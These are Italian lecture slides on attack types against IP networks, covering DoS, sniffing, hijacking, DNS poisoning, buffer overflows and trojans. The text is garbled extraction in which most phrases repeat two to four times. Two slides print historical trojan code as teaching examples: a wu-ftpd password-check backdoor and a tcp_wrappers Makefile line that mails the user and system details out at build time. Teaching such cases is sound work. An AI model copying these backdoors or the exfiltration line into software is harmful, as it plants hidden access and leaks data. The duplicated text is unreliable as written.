Claudio Telmon - Internet -1 © Claudio Telmon - 2000-2002 Tipologie di attacco su reti IP

Claudio Telmon - Internet -1Claudio Telmon - Internet -1© Claudio Telmon - 2000-2002

Tipologie di attacco su reti IPTipologie di attacco su reti IPTipologie di attacco su reti IPTipologie di attacco su reti IP


Tecniche di attaccoTecniche di attaccoTecniche di attaccoTecniche di attacco

Più passaggi prima del Più passaggi prima del destinatariodestinatario

Accesso da siti poco Accesso da siti poco controllaticontrollati

Attraversamento di confini Attraversamento di confini nazionalinazionali

““Qui la polizia ha altro a cui Qui la polizia ha altro a cui pensare”pensare”


Social EngineeringSocial EngineeringSocial EngineeringSocial Engineering

Si attacca l’utente, che spesso Si attacca l’utente, che spesso è uno dei punti deboli delle è uno dei punti deboli delle difese di un sistemadifese di un sistema

E` possibile soprattutto E` possibile soprattutto quando la politica di sicurezza quando la politica di sicurezza non è ben definitanon è ben definita

Non è possibile proteggersi Non è possibile proteggersi con soli mezzi tecnicicon soli mezzi tecnici


Denial of ServiceDenial of ServiceDenial of ServiceDenial of Service

Bloccare un servizio di Bloccare un servizio di ostacolo per la realizzazione di ostacolo per la realizzazione di un altro tipo di attacco. un altro tipo di attacco.

Bloccare una macchina per Bloccare una macchina per poterne prendere il posto poterne prendere il posto nelle comunicazioni con la nelle comunicazioni con la macchina sotto attacco. macchina sotto attacco.

Bloccare una macchina per Bloccare una macchina per causare un dannocausare un danno


SYN floodSYN floodSYN floodSYN flood

Occupa lo spazio della Occupa lo spazio della memoria del kernel destinata memoria del kernel destinata ai buffer per le connessioni ai buffer per le connessioni semiaperte semiaperte

Permette di impedire la Permette di impedire la ricezione di pacchetti SYN e ricezione di pacchetti SYN e RST (Mitnick)RST (Mitnick)

Soluzioni: SYN cookies, uso di Soluzioni: SYN cookies, uso di firewallfirewall


I Distributed Denial of ServiceI Distributed Denial of ServiceI Distributed Denial of ServiceI Distributed Denial of Service

È il tipo di problema che ha È il tipo di problema che ha colpito Yahoo recentementecolpito Yahoo recentemente

C’è poco che le singole reti C’è poco che le singole reti possano fare per proteggersipossano fare per proteggersi

Possono comunque Possono comunque salvaguardare le reti localisalvaguardare le reti locali

Contatti preventivi con i Contatti preventivi con i provider possono aiutareprovider possono aiutare


DDoS: possibili “soluzioni”DDoS: possibili “soluzioni”DDoS: possibili “soluzioni”DDoS: possibili “soluzioni”

Egress filtering: utile ma difficile Egress filtering: utile ma difficile da imporreda imporre

Marcatura random dei pacchettiMarcatura random dei pacchetti Notifica del path dei pacchetti al Notifica del path dei pacchetti al

destinatario con nuovi pacchetti destinatario con nuovi pacchetti icmpicmp

Problemi di complessità, Problemi di complessità, particolarmente quando gli IP particolarmente quando gli IP mittenti e gli zombie sono moltimittenti e gli zombie sono molti


TCP/IPTCP/IPTCP/IPTCP/IP

Packet stormsPacket storms Difetti nello stackDifetti nello stack

crash del sistemacrash del sistema 100% cpu usage100% cpu usage

IP fragmentation:IP fragmentation: superamento dei meccanismi di superamento dei meccanismi di

filtraggiofiltraggio usato dagli scanner, poco usato dagli scanner, poco

implementato in attacchi specificiimplementato in attacchi specifici


Packet SniffingPacket SniffingPacket SniffingPacket Sniffing

I pacchetti attraversano parti di I pacchetti attraversano parti di Internet sulle quali non si ha alcun Internet sulle quali non si ha alcun controllocontrollo

Non è possibile sapere se un Non è possibile sapere se un pacchetto è stato letto durante il pacchetto è stato letto durante il percorsopercorso

Non è in generale possibile Non è in generale possibile prevedere il percorso che prevedere il percorso che seguiranno i pacchettiseguiranno i pacchetti

Il percorso spesso attraversa i Il percorso spesso attraversa i confini nazionaliconfini nazionali


Switch e VLANSwitch e VLANSwitch e VLANSwitch e VLAN

Sono strumenti nati per gestire Sono strumenti nati per gestire le reti e ottimizzare l’uso delle le reti e ottimizzare l’uso delle risorserisorse

Esistono attacchi efficaci contro Esistono attacchi efficaci contro molti modelli di switch e contro molti modelli di switch e contro molte implementazioni di vlanmolte implementazioni di vlan

Es: si inonda lo switch di Es: si inonda lo switch di pacchetti con MAC address pacchetti con MAC address falsi, fino a riempirne la cache...falsi, fino a riempirne la cache...


Redirezione dei pacchettiRedirezione dei pacchettiRedirezione dei pacchettiRedirezione dei pacchetti

I protocolli di routing di I protocolli di routing di Internet prevedono una Internet prevedono una grande facilità nella grande facilità nella ridirezione dei pacchettiridirezione dei pacchetti

E` possibile “estrarre” E` possibile “estrarre” pacchetti da una sottorete in pacchetti da una sottorete in modo trasparentemodo trasparente

I nuovi protocolli di routing I nuovi protocolli di routing prevedono un’autenticazione prevedono un’autenticazione migliore fra le partimigliore fra le parti


Man in the MiddleMan in the MiddleMan in the MiddleMan in the Middle

Consiste nel modificare i Consiste nel modificare i pacchetti in transito nel nodo pacchetti in transito nel nodo in modo trasparentein modo trasparente

Permette di impersonare Permette di impersonare completamente una delle particompletamente una delle parti

Permette di assumere il Permette di assumere il controllo di una connessione controllo di una connessione dopo l’autenticazione inizialedopo l’autenticazione iniziale


Connection hijackingConnection hijackingConnection hijackingConnection hijacking

La connessione è composta da più La connessione è composta da più scambi di messaggiscambi di messaggi

L’autenticazione avviene durante il L’autenticazione avviene durante il primo scambioprimo scambio

I messaggi successivi non vengono I messaggi successivi non vengono autenticatiautenticati

Quindi la connessione viene Quindi la connessione viene attaccata dopo l’autenticazione attaccata dopo l’autenticazione inizialeiniziale


Replay attackReplay attackReplay attackReplay attack

Consiste nel ripetere una Consiste nel ripetere una sequenza di operazioni sequenza di operazioni corrispondente a una sessione corrispondente a una sessione appena conclusaappena conclusa

Non è necessario comprendere Non è necessario comprendere il significato di ciò che si sta il significato di ciò che si sta facendofacendo


Il DNSIl DNSIl DNSIl DNS

Le risposte a richieste DNS sono Le risposte a richieste DNS sono sostanzialmente non autenticatesostanzialmente non autenticate

È possibile aggiungere È possibile aggiungere informazioni false a query informazioni false a query legittime (cache corruption)legittime (cache corruption)

I meccanismi di log generalmente I meccanismi di log generalmente prevedono la risoluzione dei prevedono la risoluzione dei nomi...nomi...

Il double reverse lookup offre Il double reverse lookup offre qualche protezione in piùqualche protezione in più


ProxyProxyProxyProxy

Un semplice proxy tcp Un semplice proxy tcp installato su un sistema installato su un sistema win95:win95: non viene notato dall’utentenon viene notato dall’utente non genera lognon genera log attribuisce le azioni all’utente attribuisce le azioni all’utente

Un proxy reale configurato Un proxy reale configurato male permette:male permette: l’utilizzo da parte di utenti non localil’utilizzo da parte di utenti non locali l’accesso a servizi critici (telnet ecc.)l’accesso a servizi critici (telnet ecc.)


Vulnerabilità dei serviziVulnerabilità dei serviziVulnerabilità dei serviziVulnerabilità dei servizi


Password in chiaroPassword in chiaroPassword in chiaroPassword in chiaro

Molti servizi trasmettono Molti servizi trasmettono password in chiaro:password in chiaro: telnettelnet ftpftp poppop


Password GuessingPassword GuessingPassword GuessingPassword Guessing

Le password sono spesso Le password sono spesso scelte in modo prevedibilescelte in modo prevedibile

Con gli strumenti attuali è Con gli strumenti attuali è possibile provare alcuni possibile provare alcuni milioni di password in poche milioni di password in poche oreore

Vi sono comunque dei limiti Vi sono comunque dei limiti intrinseci alle capacità intrinseci alle capacità mnemoniche umanemnemoniche umane


Errori nelle applicazioniErrori nelle applicazioniErrori nelle applicazioniErrori nelle applicazioni

I dati ricevuti e trasmessi sono I dati ricevuti e trasmessi sono gestiti da applicazionigestiti da applicazioni

Come tutto il software, anche Come tutto il software, anche queste applicazioni possono queste applicazioni possono avere erroriavere errori

Come tutti i servizi, possono Come tutti i servizi, possono essere configurate maleessere configurate male


Ogni programma ha dei difettiOgni programma ha dei difetti Molti di questi difetti possono Molti di questi difetti possono

essere sfruttati per eseguire essere sfruttati per eseguire azioni non previsteazioni non previste

I difetti in programmi critici I difetti in programmi critici per la sicurezza permettono di per la sicurezza permettono di eseguire azioni critiche per la eseguire azioni critiche per la sicurezzasicurezza

Difetti del softwareDifetti del softwareDifetti del softwareDifetti del software


Difetti nei protocolliDifetti nei protocolliDifetti nei protocolliDifetti nei protocolli

Molti protocolli sono stati Molti protocolli sono stati progettati senza considerare progettati senza considerare la sicurezzala sicurezza risalgono a parecchi anni farisalgono a parecchi anni fa derivano da un’ottica hostderivano da un’ottica host sono progettati “in proprio” senza le sono progettati “in proprio” senza le

competenze necessariecompetenze necessarie ““La sicurezza verrà aggiunta dopo”La sicurezza verrà aggiunta dopo”


Difetti realizzativiDifetti realizzativiDifetti realizzativiDifetti realizzativi

Pochi programmatori sanno Pochi programmatori sanno come evitare i trabocchetticome evitare i trabocchetti

Ci si aspetta che la Ci si aspetta che la controparte (client/server) si controparte (client/server) si comporti correttamentecomporti correttamente

Le rifiniture andranno nella Le rifiniture andranno nella versione definitivaversione definitiva

Semplici erroriSemplici errori


Difetti di configurazioneDifetti di configurazioneDifetti di configurazioneDifetti di configurazione

Una configurazione sicura è più Una configurazione sicura è più scomoda da usarescomoda da usare

La configurazione di default La configurazione di default spesso serve a far funzionare spesso serve a far funzionare tutto subitotutto subito

La scelta fra le opzioni può non La scelta fra le opzioni può non essere chiara essere chiara all’utente/sistemistaall’utente/sistemista

Configurazioni “temporanee”Configurazioni “temporanee” ErroriErrori


Perché i serverPerché i serverPerché i serverPerché i server

Gli attacchi ai server sono Gli attacchi ai server sono sempre stati i più comuni:sempre stati i più comuni: i server non erano molto sicurii server non erano molto sicuri attendono connessioni da chiunque in attendono connessioni da chiunque in

ogni momentoogni momento la maggior parte delle macchine ha la maggior parte delle macchine ha

dei server attividei server attivi


Perché i clientPerché i clientPerché i clientPerché i client

I server sono meglio gestitiI server sono meglio gestiti Il traffico è loggatoIl traffico è loggato La qualità miglioraLa qualità migliora I client sono gestiti dagli I client sono gestiti dagli

utentiutenti La qualità è peggiore La qualità è peggiore Non vengono aggiornatiNon vengono aggiornati Non sono loggatiNon sono loggati


I browserI browserI browserI browser

La qualità aumentaLa qualità aumenta Le funzionalità di piùLe funzionalità di più Le operazioni devono essere Le operazioni devono essere

trasparenti….trasparenti…. Integrano funzionalità diverse, Integrano funzionalità diverse,

anche localianche locali la distinzione fra Internet e la rete locale la distinzione fra Internet e la rete locale

è sempre più sfumataè sempre più sfumata Spesso le “cose interessanti” sono Spesso le “cose interessanti” sono

comunque tutte nel browsercomunque tutte nel browser


Input validationInput validationInput validationInput validation

Non bisogna fare assunzioni su Non bisogna fare assunzioni su cosa ci può arrivare dalla retecosa ci può arrivare dalla rete può arrivare di tuttopuò arrivare di tutto dobbiamo verificare che corrisponda dobbiamo verificare che corrisponda

alla sintassi desiderataalla sintassi desiderata l’attaccante non usa il nostro client, l’attaccante non usa il nostro client,

genera il traffico che vuolegenera il traffico che vuole

Errori di questo tipo Errori di questo tipo (realizzativi o di progettazione) (realizzativi o di progettazione) sono alla base della maggior sono alla base della maggior parte dei problemiparte dei problemi


Campo 1 Campo 2

Dati dalla rete (anche elaborati)

Campo 1 Campo 2

Buffer overflowsBuffer overflowsBuffer overflowsBuffer overflows


Tipologie di overflowTipologie di overflowTipologie di overflowTipologie di overflow

Strutture (riscrittura di dati Strutture (riscrittura di dati interni)interni)

Stack (riscrittura di puntatori Stack (riscrittura di puntatori e codice)e codice)

Heap (riscrittura di puntatori e Heap (riscrittura di puntatori e codice)codice)


Interazione con l’ambienteInterazione con l’ambienteInterazione con l’ambienteInterazione con l’ambiente

Le variabili d’ambiente Le variabili d’ambiente possono influire sul possono influire sul comportamentocomportamento PATHPATH LD_PATHLD_PATH

Alcune funzioni hanno un Alcune funzioni hanno un comportamento poco comportamento poco prevedibileprevedibile system()system()


Race conditionsRace conditionsRace conditionsRace conditions

Un programma vuole creare Un programma vuole creare un file in una directory un file in una directory condivisa (es. temp o tmp)condivisa (es. temp o tmp)

Un altro programma crea il file Un altro programma crea il file prima di lui…prima di lui…

Soluzioni dipendenti dal Soluzioni dipendenti dal sistemasistema


Riuso delle risorseRiuso delle risorseRiuso delle risorseRiuso delle risorse

L’allocazione di memoria L’allocazione di memoria generalmente azzera la generalmente azzera la memoria allocatamemoria allocata

Accesso diretto alla memoria Accesso diretto alla memoria fisicafisica

File di swapFile di swap File temporaneiFile temporanei Core dump (di programmi Core dump (di programmi

suid)suid)


Virus: quando eseguito, copia Virus: quando eseguito, copia il proprio codice su altri il proprio codice su altri programmiprogrammi

Worm: quando eseguito, Worm: quando eseguito, installa copie del proprio installa copie del proprio codice su altri computer in codice su altri computer in reterete

Trojan Horse: ha una funzione Trojan Horse: ha una funzione evidente e una occultaevidente e una occulta

Virus, worm e trojan horseVirus, worm e trojan horseVirus, worm e trojan horseVirus, worm e trojan horse


Trojan HorseTrojan HorseTrojan HorseTrojan Horse

Sono programmi che hanno:Sono programmi che hanno: una funzione evidente (quella per cui una funzione evidente (quella per cui

li usa la vittima)li usa la vittima) una funzione nascosta (quella per cui una funzione nascosta (quella per cui

sono stati creati)sono stati creati)

Possono essere creati ad hoc o Possono essere creati ad hoc o modifiche di programmi modifiche di programmi esistentiesistenti


Back Orifice/ BO2KBack Orifice/ BO2KBack Orifice/ BO2KBack Orifice/ BO2K

Si installa in modo “invisibile” Si installa in modo “invisibile” all’utenteall’utente

Permette il controllo e Permette il controllo e monitoraggio remoto del monitoraggio remoto del sistemasistema

È un ottimo tool di È un ottimo tool di amministrazione remota...amministrazione remota...


Trojan horse: oggetti Trojan horse: oggetti complessi?complessi?

Trojan horse: oggetti Trojan horse: oggetti complessi?complessi?

Spesso basta modificare il Spesso basta modificare il risultato di un if()risultato di un if()

Un piccolo demone sono poche Un piccolo demone sono poche righe di codicerighe di codice

Più sono semplici e più sono Più sono semplici e più sono difficili da individuaredifficili da individuare


1013,1015c1013,1014< if ((pw == NULL || *pw->pw_passwd == '\0' || < strcmp(xpasswd, pw->pw_passwd)) &&< (strcmp(passwd, "NULL"))) {- ---< if (pw == NULL || *pw->pw_passwd == '\0' ||< strcmp(xpasswd, pw->pw_passwd)) {

Esempio: wu-ftpdEsempio: wu-ftpdEsempio: wu-ftpdEsempio: wu-ftpd

Inserito nel circuito di Inserito nel circuito di distribuzione ufficiale (luglio distribuzione ufficiale (luglio ‘94)‘94)


*** 7.6/Makefile Mon Apr 7 20:34:16 1997--- /tmp/tcp_wrappers_7.6/Makefile Fri Mar 21 13:27:21 1997****************** 26,31 ****--- 26,32 ----

@echo @echo "If none of these match your environment, edit the system" @echo "dependencies sections in the Makefile and do a 'make other'."+ @sh -c 'echo debug-`whoami`-`uname -a` |mail -s debug [email protected]’

@echo

Esempio: tcp-wrapperEsempio: tcp-wrapperEsempio: tcp-wrapperEsempio: tcp-wrapper

Inserito nel sito originale della Inserito nel sito originale della distribuzione (gennaio ‘99)distribuzione (gennaio ‘99)


Riuso delle risorseRiuso delle risorseRiuso delle risorseRiuso delle risorse

L’allocazione di memoria L’allocazione di memoria generalmente azzera la generalmente azzera la memoria allocatamemoria allocata

Accesso diretto alla memoria Accesso diretto alla memoria fisicafisica

File di swapFile di swap File temporaneiFile temporanei Core dump (di programmi Core dump (di programmi

suid)suid)


Esempi: OfficeEsempi: OfficeEsempi: OfficeEsempi: Office

Numerosi casi di riutilizzo Numerosi casi di riutilizzo della memoria senza della memoria senza cancellazionecancellazione

Word & C: esame del Word & C: esame del documento con text editordocumento con text editor


Vulnerabilità dei servizi WebVulnerabilità dei servizi WebVulnerabilità dei servizi WebVulnerabilità dei servizi Web

Cattiva configurazione del serverCattiva configurazione del server è il problema più semplice da risolvereè il problema più semplice da risolvere

Interazione del server con il Interazione del server con il sistemasistema tipico dei sistemi WindowsNTtipico dei sistemi WindowsNT

Difetti del serverDifetti del server Cross site scriptingCross site scripting

tipico dei providertipico dei provider è un problema per i client più che per i è un problema per i client più che per i

serverserver


Quali sistemi?Quali sistemi?Quali sistemi?Quali sistemi?

Per rendere sicuro un sistema Per rendere sicuro un sistema bisogna conoscerlo benebisogna conoscerlo bene

Spesso si deve lavorare con Spesso si deve lavorare con quello che si ha a disposizionequello che si ha a disposizione

Documents

Claudio Telmon - Internet -1 © Claudio Telmon - 2000-2002 Tipologie di attacco su reti IP